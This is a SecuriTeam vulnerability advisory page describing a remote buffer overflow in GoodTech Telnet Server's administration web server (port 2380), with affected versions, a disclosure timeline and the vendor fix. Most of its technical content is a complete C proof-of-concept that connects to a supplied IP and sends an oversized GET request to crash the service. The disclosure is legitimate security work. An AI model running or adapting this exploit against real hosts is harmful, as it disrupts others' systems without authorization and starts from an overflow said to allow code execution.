SecuriTeam - GoodTech Telnet Server Buffer Overflow Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

GoodTech Telnet Server turns "a Windows NT/2000/XP/2003 system into a multi-user Telnet server". GoodTech's administration web server interface is vulnerable to a remote buffer overflow, allowing a malicious attacker to run arbitrary commands on a vulnerable machine.

Credit:
The information has been provided by Komrade.
The original article can be found at: http://unsecure.altervista.org/security/goodtechtelnet.htm

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* GoodTech Telnet Server version 5.0.6 and prior

Immune Systems:
* GoodTech Telnet Server version 5.0.7 or newer

The GoodTech program runs an administration web server (default port 2380). By sending a a very long string (10040 bytes) suffixed by two newline characters, a remote attacker can trigger a buffer overflow vulnerability, overwriting the instruction pointer and giving the possibility to execute arbitrary code remotely in the LOCAL_SYSTEM context.

Proof of Concept Code:
/**********************************
  GoodTech Telnet Server Buffer Overflow Crash POC
  created by Komrade
  e-mail: unsecure(at)altervista(dot)org
  web: http://unsecure.altervista.org

  Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
   on a Windows XP Professional sp2 operating system.

  This exploit connects to the Administration server of GoodTech Telnet Server
  (default port 2380) and sends a very long string (10040 bytes).
  After the exploit is sent the Telnet Server will crash, trying to access
  to a bad memory address: 0xDEADCODE.

  Usage: gtscrash.exe "IP address"

  Options:
  "IP address" The IP address of the computer running GoodTech Telnet Server
**********************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{
SOCKET sock;
struct sockaddr_in sock_addr;
WSADATA data;
WORD p;
p=MAKEWORD(2,0);
WSAStartup(p,&data);
int i, n, err;
unsigned char *mex;
char risp[4096];

printf("--------------------------------------------\r\n");
printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
printf("\t\t\tcreated by Komrade\r\n\r\n");

printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
printf("\t\tweb: http://unsecure.altervista.org\r\n");
printf("--------------------------------------------\r\n\r\n");

if (argc < 2){
  printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
  printf("Options:\r\n");
  printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
  exit(0);
}

mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

sock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(2380); /* Administration web server port */
sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
if(err<0){
  printf("Unable to connect() to %s\n", argv[1]);
  exit(-1);
}

strcpy (mex, "GET /");

for(i = strlen(mex); i < 10032; i++)
  mex[i]= 'a';
mex[i]=0;

strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
strcat(mex, "\r\n\r\n");

printf("Sending %d bytes.....\n\n", strlen(mex));
n=send(sock, mex , strlen(mex), 0);

n=recv(sock, risp, sizeof(risp), 0);
if (n < 0)
  printf("GoodTech Telnet Server succesfully crashed!!\n");
else{
  risp[n]=0;
  printf("%s\n", risp);
}

closesocket(sock);
WSACleanup();
return 0;
}

The original proof of concept code can be found at: http://unsecure.altervista.org/security/gtscrash.c.txt

Vendor Status:
Vendor was notified on 14/03/2005. The vendor released a fix in the new version 5.0.7
See to download the new fixed version.

Disclosure Timeline:
11/03/2005 - Vulnerability found.
14/03/2005 - Vendor contacted.
15/03/2005 - Vendor reply.
15/03/2005 - Vulnerability fixed. A new version of GoodTech Telnet Server is now available at the vendor's website at: http://www.goodtechsys.com

blog comments powered by Disqus

	Novell Zenworks Software Packaging LaunchHelp.dll Code Execution Vulnerability
	Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability
	Microsoft Internet Explorer swapNode Handling Code Execution Vulnerability
	Microsoft Internet Explorer Select Element Insufficient Type Checking Code Execution Vulnerability
	Internet Explorer Select Element Cache Code Execution Vulnerability
	Microsoft Office Graph DataFormat Signed Index Code Execution Vulnerability
	Microsoft Office Excel Conditional Expression Ptg Type Confusion Vulnerability
	Microsoft Internet Explorer Protected Mode Bypass Vulnerability
	Microsoft Internet Explorer 9 STYLE Object Parsing Code Execution Vulnerability
	Microsoft Internet Explorer XSLT SetViewSlave Code Execution Vulnerability
	CA Total Defense Suite Gateway Security Malformed HTTP Packet Code Execution Vulnerability
	HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Code Execution Vulnerability
	TrendMicro Control Manager CASProcessor.exe BLOB Code Execution Vulnerability
	Symantec Veritas Storage Foundation vxsvc.exe Unicode Code Execution Vulnerability
	HP iNode Management Center iNodeMngChecker.exe Code Execution Vulnerability